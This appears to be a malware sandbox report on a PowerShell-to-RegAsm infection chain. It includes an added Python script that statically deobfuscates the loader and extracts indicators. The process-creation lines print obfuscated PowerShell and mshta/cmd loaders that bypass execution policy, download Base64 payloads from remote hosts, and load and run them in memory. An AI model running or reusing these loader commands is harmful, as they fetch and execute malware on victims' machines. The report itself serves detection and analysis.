Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"
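The process-creation entries above show the same loader under two string-building tricks. The powershell.exe chain assembles its script from dozens of '...'+'...' fragments, with CNA standing in for the quote character and gYF for $, and then pipes the text into . ($env:comspec[4,26,25]-join''), which spells iex out of characters 4, 26 and 25 of C:\Windows\system32\cmd.exe. The mshta.exe chain instead builds :: and the double quote from [char] casts around a Base64 blob. The Python script below is an added example, not part of this Joe Sandbox report, that undoes both layers statically rather than letting PowerShell evaluate them: it concatenates only quoted literals and [char] casts, resolves the COMSPEC slice against the default value (an assumption; a non-default COMSPEC changes the result), applies the .replace() calls, and then reads the recovered script back for indicators. Recovered, the script downloads Base64 text from the archive.org URL, loads it with [Reflection.Assembly]::Load, and invokes RunPE.Home.VAI with a payload URL written backwards and RegAsm as the host-process argument, which matches the RegAsm.exe child seen above. CHAR_CAST_SAMPLE is a constructed stand-in for the mshta chain with AAAA in place of the blob, because the report prints that blob entirely in lower case and it cannot be decoded as shown.

```python
import re

# The -command argument of the hidden powershell.exe, copied from the process-creation entry above.
OBSERVED = r"""('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"""

# Constructed stand-in for the mshta -> cmd -> powershell chain: same [char] casts for '::' and '"',
# but 'AAAA' replaces the Base64 blob, which the report shows case-folded and therefore undecodable.
CHAR_CAST_SAMPLE = ("'[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'"
                    "+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'AAAA'+[char]0x22+'))'")

# Tokens we evaluate: single-quoted literals ('' is an escaped quote) and [char]N / [string][char]N casts.
TOKEN = re.compile(r"'((?:[^']|'')*)'|\[(?:string\]\[)?char\](0x[0-9a-f]+|\d+)", re.I)
REPLACE_CALL = re.compile(r"^\s*\.replace\(", re.I)
COMSPEC_SLICE = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def eval_concat(expr: str) -> str:
    """Concatenate the literals and [char] casts of a '+'-joined PowerShell string expression.
    Everything else is ignored, so only use it on expressions that are pure string building."""
    parts = []
    for lit, code in TOKEN.findall(expr):
        parts.append(chr(int(code, 0)) if code else lit.replace("''", "'"))  # int(...,0) takes 58 or 0x3a
    return "".join(parts)


def split_group(s: str):
    """Split a string starting with '(' into (inner, rest) at the matching ')', ignoring parens in literals."""
    if not s.startswith("("):
        raise ValueError("expected '('")
    depth, in_str, i = 0, False, 0
    while i < len(s):
        c = s[i]
        if in_str:
            if c == "'":
                if s[i + 1:i + 2] == "'":
                    i += 1  # '' inside a literal is an escaped quote, not the end
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return s[1:i], s[i + 1:]
        i += 1
    raise ValueError("unbalanced parentheses")


def split_args(args: str):
    """Split an argument list on commas that are outside single-quoted literals."""
    parts, cur, in_str = [], [], False
    for c in args:
        if c == "'":
            in_str = not in_str
        if c == "," and not in_str:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(c)
    parts.append("".join(cur))
    return parts


def deobfuscate(command: str, comspec: str = r"C:\Windows\system32\cmd.exe") -> dict:
    """Undo (<concat>).replace(a,b)... | . ($env:comspec[i,j,k]-join'') and return the real script."""
    inner, rest = split_group(command.strip())
    script = eval_concat(inner)
    replacements = []
    while REPLACE_CALL.match(rest):
        args, rest = split_group(rest[rest.index("("):])
        old, new = (eval_concat(a) for a in split_args(args))
        script = script.replace(old, new)  # case-sensitive, like .NET String.Replace
        replacements.append((old, new))
    m = COMSPEC_SLICE.search(rest)
    invoker = "".join(comspec[int(i)] for i in m.group(1).split(",")) if m else None
    return {"script": script, "replacements": replacements, "invoker": invoker}


def extract_iocs(script: str) -> dict:
    """Pull URLs, the loaded .NET type/method and the Invoke() arguments out of the recovered script.
    Every literal is also scanned reversed, because the loader passes its payload URL backwards."""
    urls = set()
    for lit in re.findall(r"'((?:[^']|'')*)'", script):
        for candidate in (lit, lit[::-1]):
            urls.update(URL.findall(candidate))
    type_m = re.search(r"GetType\('([^']+)'\)", script)
    meth_m = re.search(r"GetMethod\('([^']+)'\)", script)
    args_m = re.search(r"Invoke\(\$null,\s*\[object\[\]\]@\((.*)\)\)", script)
    args = [a.strip().strip("'") for a in split_args(args_m.group(1))] if args_m else []
    return {"urls": sorted(urls),
            "dotnet_type": type_m.group(1) if type_m else None,
            "dotnet_method": meth_m.group(1) if meth_m else None,
            "invoke_args": args}


if __name__ == "__main__":
    result = deobfuscate(OBSERVED)
    print("invoked via:", result["invoker"])
    print(result["script"])
    for key, value in extract_iocs(result["script"]).items():
        print(f"{key}: {value}")
    print(eval_concat(CHAR_CAST_SAMPLE))
```

deobfuscate and extract_iocs are pure functions, so the same code can be run over collected command lines in bulk; the COMSPEC default is the only environment assumption, and the evaluator deliberately refuses to do anything but string concatenation, which is what makes it safe to point at hostile input.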
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerL
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager,
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageres }
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`
Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [Program Manager]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434CB6 cpuid 11_2_00434CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_0045201B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_004520B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_00452393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_00448484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_004525C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_0044896D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA,11_2_0040F90C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_00451FD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
